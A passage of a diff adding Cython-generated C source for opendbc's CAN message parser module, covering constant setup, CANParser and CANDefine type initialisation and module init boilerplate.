__pyx_int_2); if (unlikely(!__pyx_slice__6)) __PYX_ERR(0, 178, __pyx_L1_error) + __Pyx_GOTREF(__pyx_slice__6); + __Pyx_GIVEREF(__pyx_slice__6); + + /* "opendbc/can/parser_pyx.pyx":111 + * self.update_strings([]) + * + * def update_strings(self, strings, sendcan=False): # <<<<<<<<<<<<<< + * for v in self.vl_all.values(): + * for l in v.values(): # no-cython-lint + */ + __pyx_tuple__9 = PyTuple_Pack(10, __pyx_n_s_self, __pyx_n_s_strings, __pyx_n_s_sendcan, __pyx_n_s_v, __pyx_n_s_l, __pyx_n_s_new_vals, __pyx_n_s_updated_addrs, __pyx_n_s_it, __pyx_n_s_cv, __pyx_n_s_cv_name); if (unlikely(!__pyx_tuple__9)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__9); + __Pyx_GIVEREF(__pyx_tuple__9); + __pyx_codeobj__10 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 10, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__9, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_opendbc_can_parser_pyx_pyx, __pyx_n_s_update_strings, 111, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__10)) __PYX_ERR(0, 111, __pyx_L1_error) + __pyx_tuple__11 = PyTuple_Pack(1, Py_False); if (unlikely(!__pyx_tuple__11)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__11); + __Pyx_GIVEREF(__pyx_tuple__11); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_tuple__12 = PyTuple_Pack(1, __pyx_n_s_self); if (unlikely(!__pyx_tuple__12)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__12); + __Pyx_GIVEREF(__pyx_tuple__12); + __pyx_codeobj__13 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__13)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + */ + __pyx_tuple__14 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__14)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__14); + __Pyx_GIVEREF(__pyx_tuple__14); + __pyx_codeobj__15 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__14, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__15)) __PYX_ERR(1, 3, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__16 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__16)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + */ + __pyx_codeobj__17 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__14, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__17)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + __pyx_umethod_PyDict_Type_get.type = (PyObject*)&PyDict_Type; + __pyx_umethod_PyDict_Type_get.method_name = &__pyx_n_s_get; + __pyx_umethod_PyDict_Type_update.type = (PyObject*)&PyDict_Type; + __pyx_umethod_PyDict_Type_update.method_name = &__pyx_n_s_update; + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + __pyx_int_0 = PyInt_FromLong(0); if (unlikely(!__pyx_int_0)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_1 = PyInt_FromLong(1); if (unlikely(!__pyx_int_1)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_2 = PyInt_FromLong(2); if (unlikely(!__pyx_int_2)) __PYX_ERR(0, 1, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + return 0; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_7opendbc_3can_10parser_pyx_CANParser = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_7opendbc_3can_10parser_pyx_CANParser_spec, NULL); if (unlikely(!__pyx_ptype_7opendbc_3can_10parser_pyx_CANParser)) __PYX_ERR(0, 18, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_7opendbc_3can_10parser_pyx_CANParser_spec, __pyx_ptype_7opendbc_3can_10parser_pyx_CANParser) < 0) __PYX_ERR(0, 18, __pyx_L1_error) + #else + __pyx_ptype_7opendbc_3can_10parser_pyx_CANParser = &__pyx_type_7opendbc_3can_10parser_pyx_CANParser; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_7opendbc_3can_10parser_pyx_CANParser) < 0) __PYX_ERR(0, 18, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_7opendbc_3can_10parser_pyx_CANParser->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_7opendbc_3can_10parser_pyx_CANParser->tp_dictoffset && __pyx_ptype_7opendbc_3can_10parser_pyx_CANParser->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_7opendbc_3can_10parser_pyx_CANParser->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_CANParser, (PyObject *) __pyx_ptype_7opendbc_3can_10parser_pyx_CANParser) < 0) __PYX_ERR(0, 18, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_7opendbc_3can_10parser_pyx_CANParser) < 0) __PYX_ERR(0, 18, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_7opendbc_3can_10parser_pyx_CANDefine_spec, NULL); if (unlikely(!__pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine)) __PYX_ERR(0, 143, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_7opendbc_3can_10parser_pyx_CANDefine_spec, __pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine) < 0) __PYX_ERR(0, 143, __pyx_L1_error) + #else + __pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine = &__pyx_type_7opendbc_3can_10parser_pyx_CANDefine; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine) < 0) __PYX_ERR(0, 143, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine->tp_dictoffset && __pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_CANDefine, (PyObject *) __pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine) < 0) __PYX_ERR(0, 143, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine) < 0) __PYX_ERR(0, 143, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init___spec, NULL); if (unlikely(!__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__)) __PYX_ERR(0, 31, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init___spec, __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__) < 0) __PYX_ERR(0, 31, __pyx_L1_error) + #else + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ = &__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__) < 0) __PYX_ERR(0, 31, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__->tp_dictoffset && __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; + } + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr_spec, NULL); if (unlikely(!__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr)) __PYX_ERR(0, 88, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr_spec, __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr) < 0) __PYX_ERR(0, 88, __pyx_L1_error) + #else + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr = &__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr) < 0) __PYX_ERR(0, 88, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr->tp_dictoffset && __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; + } + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr_spec, NULL); if (unlikely(!__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr)) __PYX_ERR(0, 98, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr_spec, __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr) < 0) __PYX_ERR(0, 98, __pyx_L1_error) + #else + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr = &__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr) < 0) __PYX_ERR(0, 98, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr->tp_dictoffset && __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; + } + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_parser_pyx(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_parser_pyx}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "parser_pyx", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initparser_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initparser_pyx(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_parser_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_parser_pyx(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_parser_pyx(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'parser_pyx' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("parser_pyx", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to parser_pyx pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_parser_pyx(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_opendbc__can__parser_pyx) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "opendbc.can.parser_pyx")) { + if (unlikely((PyDict_SetItemString(modules, "opendbc.can.parser_pyx", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_type_import_code(); + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code 